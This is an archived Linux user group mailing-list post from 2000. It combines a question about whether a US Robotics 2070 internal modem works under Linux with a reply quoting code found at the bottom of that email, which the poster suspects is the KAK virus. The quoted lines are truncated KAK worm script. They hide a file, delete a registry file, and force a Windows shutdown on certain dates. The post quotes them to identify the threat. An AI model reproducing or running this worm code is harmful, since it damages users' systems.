[lug] US robotic 33/56k voice/fax modem (internal) model 2070
PC Drew
drewpc at colorado.edu
Sun Aug 20 10:22:46 MDT 2000
what the hell is this?
');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 &&
d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();S3 driver memory
alloc failed !]]%%%%%";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu
5.")!=-1))scr.write(); //-->
This was at the bottom of the email that I'm replying to...is it the
KAK virus?
PC Drew
Thus spake pt.henderson on Sunday, August 20, 2000, 9:30:48 AM:
ph> Is this modem Linux compatible? I am assuming that it is not PNP because it has jumpers that are set for irq 3. However when I run pnpdump --regdump it displays the modem info. Can someone give
ph> me a clue? The modem came with my Dell Dimension XPS d266 purchased in Oct 1998. This is about the time of the transition to winmodems - is this a winmodem?
ph> If anyone can help me configure this modem, it would greatly be appreciated!
ph> Thanks
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